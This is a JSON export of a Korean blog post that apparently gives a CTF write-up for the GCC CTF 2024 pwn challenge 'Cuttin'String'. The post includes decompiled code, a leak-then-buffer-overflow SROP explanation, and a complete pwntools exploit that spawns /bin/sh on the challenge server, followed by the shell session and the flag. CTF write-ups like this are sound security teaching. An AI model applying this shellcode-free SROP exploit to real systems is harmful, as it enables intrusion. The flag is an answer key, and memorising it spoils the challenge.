{"id":1700,"date":"2024-03-08T17:28:04","date_gmt":"2024-03-08T08:28:04","guid":{"rendered":"https:\/\/h4ck.kr\/?p=1700"},"modified":"2025-06-27T13:09:11","modified_gmt":"2025-06-27T04:09:11","slug":"gcc-ctf-2024-pwn-cuttinstring","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=1700","title":{"rendered":"GCC CTF 2024 \u2013 Pwn\/Cuttin’String"},"content":{"rendered":"\n
\"\"<\/figure>\n\n\n\n

Description<\/h2>\n\n\n\n

I made the lightest string cutting tool!<\/p>\n\n\n\n

Some people reported bugs, but anyway you can’t exploit them as there is no libc.<\/p>\n\n\n\n

Author: Drahoxx<\/a><\/p>\n\n\n\n

nc challenges1.gcc-ctf.com 4004<\/code><\/p>\n\n\n\n

checksec<\/h2>\n\n\n\n
\n
\n
seo@seo:~\/Documents\/gcc_ctf_2024\/Cuttin_String$ checksec .\/chall\n[!] Did not find any GOT entries\n[*] '\/home\/seo\/Documents\/gcc_ctf_2024\/Cuttin_String\/chall'\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Decompiled-src<\/h2>\n\n\n\n
start<\/h3>\n\n\n\n
\n
\n
void __fastcall __noreturn start(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)\n{\n  int v6; \/\/ edx\n  int v7; \/\/ ecx\n  int v8; \/\/ r8d\n  int v9; \/\/ r9d\n\n  PUTS(\n    a1,\n    a2,\n    a3,\n    a4,\n    a5,\n    a6,\n    0LL,\n    (__int64)\"\\nCuttin'String, the smallest string cutting tool\\n-----------------------------------------------\\n\");\n  while ( 1 )\n    main_loop(a1, a2, v6, v7, v8, v9);\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
main_loop<\/h3>\n\n\n\n
\n
\n
__int64 __fastcall main_loop(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)\n{\n  __int64 v6; \/\/ rdx\n  __int64 v7; \/\/ rcx\n  __int64 v8; \/\/ r8\n  __int64 v9; \/\/ r9\n  __int64 v10; \/\/ rdx\n  __int64 v11; \/\/ rcx\n  __int64 v12; \/\/ r8\n  __int64 v13; \/\/ r9\n\n  PUTS(a1, a2, a3, a4, a5, a6, 0LL, (__int64)\"Enter the length of the string (in decimal) > \");\n  get_len_str();\n  PUTS(a1, a2, v6, v7, v8, v9, 0LL, (__int64)\"Enter the string to cut > \");\n  read_and_print_str();\n  return PUTS(a1, a2, v10, v11, v12, v13, 0LL, (__int64)\"\\n\\n---\\n\");\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
get_len_str<\/h3>\n\n\n\n
\n
\n
__int64 get_len_str()\n{\n  __int64 v0; \/\/ r8\n  __int64 v1; \/\/ r9\n  __int64 v2; \/\/ r10\n  __int64 i; \/\/ rcx\n  __int64 result; \/\/ rax\n  signed __int64 v5; \/\/ rax\n  char v6[8]; \/\/ [rsp+0h] [rbp-8h] BYREF\n\n  _LOAD_SYS_READ();\n  __asm { syscall; LINUX - }\n  v2 = 0LL;\n  for ( i = 0LL; i != 8; ++i )\n  {\n    result = (unsigned __int8)v6[i];\n    if ( !(_BYTE)result || (_BYTE)result == 10 )\n      break;\n    if ( (unsigned __int8)result < 0x30u || (unsigned __int8)result > 0x39u )\n    {\n      PUTS(0LL, (__int64)v6, 8LL, i, v0, v1, 0LL, (__int64)\"Error. Enter a number in decimal.\\n\");\n      v5 = sys_exit(0);\n    }\n    if ( i )\n      v2 *= 10LL;\n    result -= 48LL;\n    v2 += result;\n  }\n  return result;\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
_LOAD_SYS_WRITE<\/h3>\n\n\n\n
\n
\n
gdb-peda$ disas __LOAD_SYS_WRITE\nDump of assembler code for function __LOAD_SYS_WRITE:\n   0x0000555555555004 <+0>:     xor    rax,rax\n   0x0000555555555007 <+3>:     mov    edi,0x1\n   0x000055555555500c <+8>:     inc    al\n   0x000055555555500e <+10>:    ret\nEnd of assembler dump.<\/pre>\n<\/div>\n<\/div>\n\n\n\n
_LOAD_SYS_READ<\/h3>\n\n\n\n
\n
\n
gdb-peda$ disas __LOAD_SYS_READ\nDump of assembler code for function __LOAD_SYS_READ:\n   0x0000555555555000 <+0>:     xor    rax,rax\n   0x0000555555555003 <+3>:     ret\nEnd of assembler dump.<\/pre>\n<\/div>\n<\/div>\n\n\n\n
read_and_print_str<\/h2>\n\n\n\n
\n
\n
__int64 read_and_print_str()\n{\n  __int64 v0; \/\/ rcx\n  __int64 v1; \/\/ r8\n  __int64 v2; \/\/ r9\n  __int64 v3; \/\/ r10\n  _BYTE v5[512]; \/\/ [rsp+0h] [rbp-200h] BYREF\n\n  _LOAD_SYS_READ();\n  __asm { syscall; LINUX - }\n  return PUTS(0LL, (__int64)v5, 1298LL, v0, v1, v2, v3, (__int64)v5);\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Solution<\/h2>\n\n\n\n
    \n
  1. get_len_str \ud568\uc218\uc5d0\uc11c \uc785\ub825\ubc1b\uc744 \uae38\uc774\ub97c 500\uc774\uc0c1\uc73c\ub85c \ud574\uc11c, \uc2a4\ud0dd\uc758 \uc784\uc758\uc8fc\uc18c\ub97c \ub178\ucd9c\uc2dc\ucf1c read_and_print_str\uc5d0\uc11c\uc758 v5 \uc2a4\ud0dd \uc8fc\uc18c\ub97c \uacc4\uc0b0\ud55c\ub2e4. \ub610, chall \ubc14\uc774\ub108\ub9ac\uc758 text base \uc8fc\uc18c \ub610\ud55c \uad6c\ud560 \uc218 \uc788\ub2e4.<\/li>\n\n\n\n
  2. read_and_print_str \ud568\uc218\ub97c \ud1b5\ud574 \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ucf1c srop\uc73c\ub85c \uc258\uc744 \ud68d\ub4dd\ud558\uba74 \ub41c\ub2e4.
    read_and_print_str\uc758 v5\uc5d0 \uc800\uc7a5\ub420 \ubc84\ud37c\uc5d0\ub294 “\/bin\/sh\\x00” \ubb38\uc790\uc5f4\uc744 \ucc44\uc6b0\uace0, srop \ud398\uc774\ub85c\ub4dc\ub97c \ud1b5\ud574 rip\uac00 \uc774\ub3d9\ub418\uac8c\ub054 \ub9cc\ub4e4\uba74 \ub41c\ub2e4. \uc774\ub3d9\ub418\uae30\uc804\uc5d0 rax\uac00 SYS_rt_sigreturn \uc2dc\uc2a4\ud15c\ucf5c \ubc88\ud638\uc778 15\uc5ec\uc57c \ud558\ub294\ub370, \uc774\ub294 _LOAD_SYS_WRITE\uc5d0 \uc788\ub294 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc778 inc al<\/code>\uc744 \uc774\uc6a9\ud558\uba74 \ub41c\ub2e4.<\/li>\n<\/ol>\n\n\n\n
    solve.py<\/h2>\n\n\n\n
    \n
    \n
    from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n#p = process(\".\/chall\")\np = remote(\"challenges1.gcc-ctf.com\", 4004)\ne = ELF('.\/chall')\n\np.sendlineafter(\"Enter the length of the string (in decimal) > \", \"500\")\np.sendlineafter(\"Enter the string to cut > \", \"0\")\n\np.recv(0xb8)\npht_entry_0 = u64(p.recv(8))\nprint(f\"pht_entry: {hex(pht_entry_0)}\")\nchall_base = pht_entry_0 - 0x40\nprint(f\"chall_base: {hex(chall_base)}\")\np.recv(120)\nunk = u64(p.recv(8))\nprint(f\"unk? {hex(unk)}\")\nbin_sh_address = unk - (0x208) #-0x4e1\n#bin_sh_address = unk  - (0x4e1 - 0x8*35 - 11)\nprint(f\"bin_sh_address? {hex(bin_sh_address)}\")\n\np.sendlineafter(\"Enter the length of the string (in decimal) > \", \"0\")\n\nbin_sh = b\"\/bin\/sh\\x00\"*50\npayload = b''\npayload += bin_sh + b'\\x41'*(512-len(bin_sh))\npayload += b\"A\"*8\nsyscall = chall_base + 0x1034\n\n# Make rax to SYS_rt_sigreturn, 15\npayload += p64(chall_base + e.symbols['__LOAD_SYS_WRITE'])\nfor i in range(15-1):\n    payload += p64(chall_base + e.symbols['__LOAD_SYS_WRITE'] + 0x8)\n#syscall\npayload += p64(syscall)\n# execve(\"\/bin\/sh\", 0, 0)\nframe2 = SigreturnFrame()\nframe2.rip = syscall\nframe2.rax = 0x3b # execve\nframe2.rsp = chall_base + 0x3fb0\nframe2.rdi = bin_sh_address\npayload += bytes(frame2)\npayload += bin_sh\n\n#pause()\np.sendlineafter(\"Enter the string to cut > \", payload)\n\n#pause()\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
    Result<\/h2>\n\n\n\n
    \n
    \n
    seo@seo:~\/Documents\/gcc_ctf_2024\/Cuttin_String$ python3 solve.py\n[+] Opening connection to challenges1.gcc-ctf.com on port 4004: Done\n[!] Did not find any GOT entries\n[*] '\/home\/seo\/Documents\/gcc_ctf_2024\/Cuttin_String\/chall'\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled\npht_entry: 0x5629a4e6a040\nchall_base: 0x5629a4e6a000\nunk? 0x7ffdf0bd11f0\nbin_sh_address? 0x7ffdf0bd0fe8\n[*] Switching to interactive mode\n$ ls\nflag.txt\npwn\n$ cat flag.txt\nGCC{SR0p_1s_f0r_Sup3r_R0P_Right?}\n$\n[*] Interrupted\n[*] Closed connection to challenges1.gcc-ctf.com port 4004<\/pre>\n<\/div>\n<\/div>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    FLAG<\/h2>\n\n\n\n
    GCC{SR0p_1s_f0r_Sup3r_R0P_Right?}<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
    Description I made the lightest string cutting tool! Some people reported bugs, but anyway you can’t exploit them as there is no libc. Author: Drahoxx nc challenges1.gcc-ctf.com 4004 checksec Decompiled-src start main_loop get_len_str _LOAD_SYS_WRITE _LOAD_SYS_READ read_and_print_str Solution solve.py Result FLAG GCC{SR0p_1s_f0r_Sup3r_R0P_Right?}<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,31,71],"class_list":["post-1700","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-rop","tag-srop"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1700"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions"}],"predecessor-version":[{"id":1703,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions\/1703"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}